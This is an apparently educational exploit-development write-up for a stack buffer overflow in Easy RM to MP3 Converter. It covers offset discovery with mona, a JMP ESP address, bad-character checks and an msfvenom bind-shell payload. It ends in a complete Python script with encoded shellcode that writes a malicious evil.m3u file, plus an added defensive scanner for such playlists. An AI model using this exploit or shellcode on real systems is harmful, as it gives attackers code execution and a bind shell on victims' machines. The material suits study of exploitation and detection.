Easy RM to MP3 Converter

  2014-05-25


Prerequisites

Identifying the Vulnerability

First of all, we need to identify an appropriate buffer size for the exploit. To do this, we simply execute the following Python script.

buffer = b"A" * 30000            # 30,000 bytes of padding, far more than a playlist entry should hold

filename = "evil.m3u"
evilfile = open(filename, 'wb')  # binary mode so no newline translation alters the bytes
evilfile.write(buffer)
evilfile.close()

Identifying EIP Offset

Subsequently, open up the resulting playlist in the converter. Boom, the application crashes.

Register values at the access violation. EIP was overwritten with AAAA

It seems that we can simply overwrite EIP. In order to identify the correct offset of the overflow, let’s create a pattern and start again.

!mona pc 5000

For this run, 25,000 As are followed by the 5,000-byte pattern. This time the application is started directly from Immunity Debugger. It crashes, and a unique part of the pattern is now stored in EIP.

Identifying the offset of EIP with a unique pattern.

When the debugger stops because of the overflow we can identify the correct offset for our custom EIP.

!mona findmsp

Mona helps in identifying the offset for the EIP overwrite (offset 1109).

The offset to EIP is therefore 25000 + 1109 = 26109. The exploit script can now be updated to reflect this, which gives us control over EIP.

Verifying the offset by overwriting EIP with BBBB.

Controlling EIP

The next step is to jump to the shellcode. Mona helps in finding an appropriate address in memory.

!mona jmp -r esp

Mona.py lists the possible JMP ESP instructions.

For this exploit the instruction at 0x77c72eee was chosen. This allows us to jump to ESP.

Identifying Bad Characters

As ESP points to 0x000FF730 (EIP+4), we can place the shellcode at that location. Before generating a payload, we also have to check for bad characters. Mona helps here too and can create a byte array that excludes the characters already known to be bad.

!mona bytearray -b '\x00\x0A'

The array has to be included in the buffer. Subsequently, bad characters can be identified in a debugger.

The byte array in memory is used to identify bad characters.

Mona also provides a command to help with this step of exploit development.

!mona compare -f bytearray.bin

Adding Shellcode

After iterating the above process to identify all bad characters, a payload can be created. Metasploit provides numerous payloads to choose from. Most importantly, the payload has to be encoded so as to eliminate the bad characters.

msfvenom -p windows/console_bind_tcp LPORT=9988 -f python --platform win --arch x86 -b '\x00\x0a\x0d'

The Exploit

Following this, the payload has to be added to the exploit script. The final step is to create the malicious m3u file and manually load it into the software.

#!/usr/bin/python

import struct

#-------------------------------------------------------------------------------------------------------#
# msfvenom -p windows/console_bind_tcp LPORT=9988 -f python --platform win --arch x86 -b '\x00\x0A\x0D' #
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                                          #
#-------------------------------------------------------------------------------------------------------#
# Encoded bind-shell payload from the msfvenom run above (368 bytes, free of the bad characters).
shellcode = (
b"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
b"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
b"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
b"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
b"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
b"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
b"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
b"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
b"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
b"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
b"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
b"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
b"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
b"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
b"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
b"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
b"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
b"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
b"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
b"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
b"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
b"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
b"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
b"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
b"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")

# Buffer layout: padding up to the saved return address, the JMP ESP address, a short NOP sled,
# the payload itself, and filler up to the 30,000 bytes used in the crash test.
buffer = b"A" * 26109
buffer += struct.pack('<L', 0x77c72eee)  # jmp esp [msv1_0.dll], packed little-endian
buffer += b"\x90" * 25                   # NOP sled
buffer += shellcode
buffer += b"C" * (30000 - len(buffer))   # filler

filename = "evil.m3u"
evilfile = open(filename, 'wb')          # binary mode so no newline translation alters the bytes
evilfile.write(buffer)
evilfile.close()

By loading the m3u file, the payload is executed.

Local listening services before and after bind shell is started by opening the custom m3u file
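Seen from the defender's side, the finished playlist has a very recognisable shape: a single entry of 30,000 bytes, long runs of one repeated byte (the A padding and the NOP sled) and a cluster of non-printable bytes where the payload sits. The scanner below (an added example, not part of the original post) applies exactly those heuristics to raw playlist bytes; the thresholds and the two sample playlists are constructed assumptions, and 0xCC bytes stand in for the payload.

```python
import re

MAX_ENTRY_LEN = 1024     # assumption: no legitimate path/URL entry is longer than this
MIN_BYTE_RUN = 16        # assumption: a run of one repeated byte this long is padding or a NOP sled
MAX_NONPRINTABLE = 16    # assumption: more non-printable bytes than this is not a path or URL


def m3u_entries(data):
    """Split raw playlist bytes into entries; '#' lines are EXTM3U directives and are skipped."""
    entries = []
    for line in re.split(rb"\r?\n", data):
        line = line.strip()
        if line and not line.startswith(b"#"):
            entries.append(line)
    return entries


def longest_run(entry):
    """Length of the longest run of one repeated byte value."""
    best = cur = 1 if entry else 0
    for prev, cur_byte in zip(entry, entry[1:]):
        cur = cur + 1 if prev == cur_byte else 1
        best = max(best, cur)
    return best


def nonprintable_count(entry):
    """Number of bytes outside printable ASCII (0x20..0x7e)."""
    return sum(1 for b in entry if b < 0x20 or b > 0x7e)


def scan_playlist(data):
    """Return [(entry_index, [reasons])] for every entry that trips a heuristic."""
    findings = []
    for i, entry in enumerate(m3u_entries(data)):
        reasons = []
        if len(entry) > MAX_ENTRY_LEN:
            reasons.append("oversized entry: %d bytes" % len(entry))
        run = longest_run(entry)
        if run >= MIN_BYTE_RUN:
            reasons.append("repeated-byte run of %d" % run)
        bad = nonprintable_count(entry)
        if bad > MAX_NONPRINTABLE:
            reasons.append("%d non-printable bytes" % bad)
        if reasons:
            findings.append((i, reasons))
    return findings


# Constructed samples; the second mirrors the write-up's layout, with 0xCC standing in for the payload.
BENIGN = b"#EXTM3U\r\n#EXTINF:123,Song\r\nC:\\Music\\song.mp3\r\nhttp://example.com/stream.mp3\r\n"
MALICIOUS = b"A" * 26109 + b"\xee\x2e\xc7\x77" + b"\x90" * 25 + b"\xcc" * 368
MALICIOUS += b"C" * (30000 - len(MALICIOUS))
```

On the benign sample `scan_playlist` returns an empty list; on the constructed malicious one it flags the single entry for all three reasons.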

Links and References